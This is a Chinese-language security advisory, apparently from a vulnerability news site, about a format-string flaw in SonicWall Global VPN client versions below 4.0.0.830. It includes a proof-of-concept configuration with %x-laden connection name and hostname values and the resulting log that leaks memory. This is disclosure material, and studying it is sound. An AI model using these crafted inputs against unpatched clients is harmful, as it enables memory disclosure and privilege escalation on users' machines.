sonicwall global vpn客户端远程格式串处理漏洞
涉及程序:
sonicwall global vpn
描述:
sonicwall global vpn客户端远程格式串处理漏洞
详细:
sonicwall global vpn客户端允许移动用户建立到sonicwall vpn网关的安全连接,访问关键网络资源。
sonicwall global vpn客户端处理配置文件时存在格式串漏洞,本地攻击者可能利用此漏洞提升权限。
如果攻击者提供了特制的配置文件,则客户端解析配置文件中connection标签的name属性和hostname标签的内容时,就会触发格式串漏洞,导致读写进程内存空间中的任意内存地址。
<*来源:bernhard mueller (research@sec-consult.com)
链接:?l=bugtraq&m=119678272603064&w=2
*>
受影响系统:
sonicwall global vpn client < 4.0.0.830
不受影响系统:
sonicwall global vpn client 4.0.0.830
攻击方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
提供特制的配置文件然后查看调试日志文件。以下配置:
<connection name=> aaaaaaaaaa%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x
<hostname> bbbbbbbbbb%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%
x.%x.%x.%x.%x.%x.%x
生成以下日志文件:
----------------------< connection name
>-----------------------------------
onlogmessage(): 'the connection "aaaaaaaaaae64d20.37327830.46413139.
203a3833.782b8d00.6f4c6e4f.73654d67.65676173.203a2928.65685427.
6e6f6320.7463656e.206e6f69.41414122.41414141.25414141" has been
enabled.' ''
----------------------</connection name
>-----------------------------------
----------------------<hostname>--------------------------------------------
bbbbbbbbbb656d616e.41414120.41414141.25414141.78252e78.2e78252e.252e7825.
78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.
74207825.6e61206f.20504920.72646461.2e737365.42272027.42424242.42424242'
----------------------</hostname>---------------------------------------
解决方案:
厂商补丁:
sonicwall
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
上一篇:beehive论坛post.php脚本远程sql注入漏洞
下一篇:squid代理缓存更新回复处理远程拒绝服务漏洞
(责任编辑:admin) |